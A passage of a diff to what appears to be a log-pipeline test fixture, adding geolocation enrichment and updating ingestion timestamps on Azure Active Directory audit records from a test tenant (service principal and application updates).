\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -13445,6 +14285,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -13580,7 +14432,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125248800Z", + "ingested": "2021-12-14T14:48:43.176727646Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826392\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc\",\"ModifiedProperties\":[],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -13607,6 +14459,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -13751,7 +14615,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125255600Z", + "ingested": "2021-12-14T14:48:43.176728274Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -13778,6 +14642,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -13922,7 +14798,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125262400Z", + "ingested": "2021-12-14T14:48:43.176728831Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -13949,6 +14825,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -14102,7 +14990,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125266700Z", + "ingested": "2021-12-14T14:48:43.176729669Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -14129,6 +15017,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -14282,7 +15182,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125272Z", + "ingested": "2021-12-14T14:48:43.176730281Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name